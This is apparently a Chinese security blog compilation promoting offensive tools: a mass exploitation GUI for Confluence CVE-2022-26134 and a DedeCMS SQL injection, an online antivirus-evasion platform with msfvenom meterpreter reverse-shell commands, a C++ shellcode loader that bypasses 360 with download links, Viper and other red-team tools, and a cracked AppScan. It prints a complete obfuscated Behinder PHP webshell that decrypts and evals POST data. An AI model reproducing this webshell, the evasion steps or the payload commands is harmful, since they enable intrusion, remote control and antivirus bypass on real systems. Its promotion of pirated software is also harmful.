GUI漏洞检测工具 -- Serein 一、工具介绍一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。可以批量利用Actively Exploited Atlassian Confluence 0Day CVE-2022-26134和DedeCMS v5.7.87 SQL注入 CVE-2022-23337。二、安装与使用1、需要python3.7~3.9git clone https://github.com/W01fh4cker/Serein.gitcd Sereinpip3 install -r requirements.txtpython3 Serein.py2、点击左上角的软件配置配置fofa的email和key（注意不是密码，而是https://fofa.info/personalData下方的API KEY），然后就可以愉快地使用fofa搜索啦。注意：必须是fofa普通/高级/企业账号，因为fofa注册会员调用api需要消耗f币，如果您是注册会员请确保您有f币，否则无法查询！3、搜集完成之后，软件的同级目录下会生成urls.txt、修正后的url.txt、host.txt，分别保存采集的原始url、添加了http/https头的url、仅网站IP。4、完成一次扫描任务后，若要开启下一次扫描，请删除文件夹下urls.txt、修正后的url.txt、host.txt这三个文件。具体教程和下载：https://github.com/W01fh4cker/Serein

潮影在线免杀平台 {mtitle title="潮影在线免杀平台"/}潮影在线免杀平台: http://bypass.tidesec.com免杀专题文章及工具：https://github.com/TideSec/BypassAntiVirus平台功能目前平台主要实现了如下功能：shellcode免杀、windows提权辅助、杀软在线对比、常见提权命令、反弹shell命令。shellcode免杀shellocde免杀使用了多种shellcode加载方式，目前以Go语言实现为主，后期会加入Powershell、C、nim等语言，对shellcode的处理使用了随机变量、AES/RC4/多重Base64/Base85/异或算法、伪造签名、随机图标、免杀分离、条件触发等方式，在本地测试的时候效果还是不错的，但发现放到在线平台后，可能样本被上传的比较多，免杀效果就比较一般了。但目前来说过火绒和360卫士还是没有问题的。使用也比较方便，只需要从Cobaltstrike或Msfvenom生成shellcode，填写到shellcode框内，调整一些参数，便可以在线生成免杀的可执行文件。Cobaltstrike生成shellcode在Cobaltstrike中Attacks-packages-Payload Generator。然后选择好Listener之后，Output选C，下面选择x64，免杀效果更好。 查看生成的shellcode把内容都整个复制到潮影在线免杀平台的输入框里就可以。之后提交，等待几秒钟就可以下载了。Metasploit 生成shellcode生成64位的payload c语言文件msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=1.1.1.1 LPORT=3333或者直接生成hex格式msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=1.1.1.1 LPORT=3333上面生成的shellcode都可以直接复制到潮影在线免杀平台，系统会自动处理后生成免杀程序。分别生成单exe和加载器 需要在cmd中运行 带上秘钥。windows提权辅助主要提供了Windows提权EXP在线搜索功能。使用方式：运行cmd命令systeminfo获取信息，粘贴systeminfo信息或只粘贴补丁信息到编辑框内。杀软在线对比在windows系统cmd中执行tasklist，将进程信息输入即可。Reverse Shell可快速生成各种反弹shell，如ncat、socat、bash、C、perl、php、powershell、python、ruby、golang、telnet等多种语言和程序，并可自定义进行base64编码等。没有一劳永逸的免杀，只有精益求精的绕过，后续平台也会继续更新完善，早日将更多语言、更多绕过姿势也都并入到平台中。

c++免杀绕过360，vt爆4个 {mtitle title="c++免杀绕过360"/}运行Python可以用在线Python 如： Lightly 生成c.ini使用须知： 把shellcode放在 encode.py 里，然后会生成一个名为sc.ini的文件 然后把cpp编译成exe，把exe和sc.ini放在同一个目录运行exe即可说明：1.把shellcode放在 encode.py 里2.然后把cpp编译成exe可以参考知乎文章 Visual Studio安装教程和使用Visual Studio编译CC++ 右键生成exe得到把exe和sc.ini放在同一个目录运行exe即可上线CS。替换好的Python：{cloud title="360-bypass-已经替换shellcode" type="default" url="https://neictop-1256272185.cos.ap-guangzhou.myqcloud.com/2022/08/15/1660548481.zip" password=""/}生成好的exe和sc.ini{cloud title="生成好的exe" type="default" url="https://neictop-1256272185.cos.ap-guangzhou.myqcloud.com/2022/08/15/1660548551.zip" password=""/}项目github地址：https://github.com/wz-wsl/360-bypass

漏洞扫描 -- Appscan Standard 10.0.7（附crack文件） 软件界面一、简介HCLAppScan Standard 是 HCL AppScan 应用程序安全测试套件的渗透测试组件，用于测试 Web 应用程序和服务。它具有识别安全漏洞的前沿方法和技术，可帮助保护应用程序免受网络攻击的威胁。二、新增功能1、新的用户体验和改善的用户体验：启动扫描的新主页屏幕左侧的导航栏使您可以快速访问工作流程中的主步骤仪表板将基本扫描数据收集在一起，在扫描运行时实时更新“问题”和“任务”视图合并为新的“问题”视图自适应用户界面设计重新设计的扫描日志。“重新设计的选项”对话框（工具 > 选项）选择您的工作首选项，浅色模式或新的深色模式2、操作系统支持：Windows Server 2022（Enterprise 和 Pro）和 Windows 113、支持 TLS 1.3（仅适用于两个新的操作系统）4、MFA：支持 TOTP 和 URL 生成的 OTP（请参阅配置 OTP）5、将安全问题导出为 CSV 格式（请参阅导出为 CSV）6、新行业标准报告：“CWE/SANS 最危险的 25 个错误”已替换为“CWE 2021 年最危险的 25 个软件弱点”“OWASP TOP 10 - 2021”

Viper(炫彩蛇)是一款图形化内网渗透工具 产品简介：{timeline}{timeline-item color="#19be6b"} Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化.{/timeline-item}{timeline-item color="#ed4014"}Viper(炫彩蛇)集成杀软绕过,内网隧道,文件管理,命令行等基础功能.{/timeline-item}{timeline-item color="#FFFF00"}Viper(炫彩蛇)当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类.{/timeline-item}{timeline-item color="#FF3EF"}Viper(炫彩蛇)目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛.{/timeline-item}{timeline-item color="#9999FF"}Viper(炫彩蛇)支持在浏览器中运行原生msfconsole,且支持多人协作.{/timeline-item}{/timeline}Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化.Viper(炫彩蛇)集成杀软绕过,内网隧道,文件管理,命令行等基础功能.Viper(炫彩蛇)当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类.可视化的内网网络拓扑展示Viper(炫彩蛇)目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛.项目github地址： github 项目官网地址： 官网

冰蝎php免杀bypass <?php @error_reporting(0); session_start(); $t='{{{{{{{{{{{{{'^chr(25).chr(26).chr(8).chr(30).chr(77).chr(79).chr(36).chr(31).chr(30).chr(24).chr(20).chr(31).chr(30); $f='file'.'_get'.'_contents'; $p='{{{{{{{{{{{'^chr(11).chr(19).chr(11).chr(65).chr(84).chr(84).chr(18).chr(21).chr(11).chr(14).chr(15); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond $_SESSION['k']=$key; $post=$f($p); if(!extension_loaded('openssl')) { $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $key = $key[$i+1&15]; $post[$i] = $port[$i]^$key; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function b($p) {eval($p."");}} @call_user_func(array(C,b),$params); ?> <?php

cs免杀-掩日一键快速生成免杀的 EXE 可执行文件 0x01 使用教程生成过程中请关闭所有的杀毒软件（包括 Windows Defender），否则很可能生成失败！！！（生成完成后正常开启即可）64位免杀效果远好于32位，能用64尽量用64生成路径中尽量不要包含中文，否则可能生成失败 处理 exe 文件也是一样的 如果你添加了自定义密码，那么就执行的时候在后面加密码就可以了，比如：xxx.exe 12340x02 引用{timeline}{timeline-item color="#19be6b"} 1.0版本参考了 Avitor 的结构。使用了 DotNetToJscript 的代码。部分代码参考了网络资料{/timeline-item}{timeline-item color="#ed4014"}2.0版本修改使用了很多网络代码，因为各种转载，来源已不可考，在此表示感谢❤{/timeline-item}{timeline-item color="#DA70D6"}3.0版本基于TheWover,Odzhan 的 Donut 项目，他们的技术水平及开源精神令人敬佩。3.0只是在他们的基础上做了一点微小的图形化工作{/timeline-item}{/timeline}{cloud title="cs免杀" type="default" url="https://github.com/1y0n/AV_Evasion_Tool" password=""/}

北极熊扫描器4.4 软件信息：产品名称：北极熊扫描器产品版本：4.4更新说明：1.更换了网段扫描的核心代码，删除了多余代码，减少多线程引起的软件崩溃问题2.增加了域安全，可对域用户进行安全检测，密码测试等功能3.简单的优化了获取网页的效率，增加软件的稳定性4.软件界面进行了轻微调整产品简介：北极熊扫描器是由“广州白狐网络科技有限公司”开发的一款信息安全审计工具，多线程获取网站信息，提供网站爬虫、网段信息检测、后台目录扫描、CMS识别、后台测试，代码审计、域安全检测等功能，部分数据可直接导出为“电子表格”，自动化任务执行上能够提升安全人员检测的便利性软件参数 1.网站蜘蛛（主要功能为获取网站的资源信息，以及根据关键字采集内容）2.网站检测，利用第三方接口快速实现获取网站的标题，程序类型，服务环境，主机IP地址等3.网段扫描，支持多线程快速对端口进行探测，并加入到列表内4.目录扫描（基本型扫描，支持多任务目标扫描，为了方便安全人员测试，附上常见的字典） 5.漏洞扫描（基于常见EXP，多任务扫描，支持子域名爆破功能）4.后台测试（便于测试人员检测后台密码是否为弱口令）5.域名侦查（可获取该域名的相关信息，如，注册人，注册时间，联系方式，域名过期时间，物理IP等）6.任务计划（数据中心标配33万IP段，可一键添加到任务计划中进行扫描）7.域安全（可一键列举域用户，查看域安全策略，对密码进行批量测试等）北极熊扫描器下载地址：北极熊扫描器.zipps：安全类软件 都会报毒，害怕勿用。 软件来源网络，使用请遵守相关法律。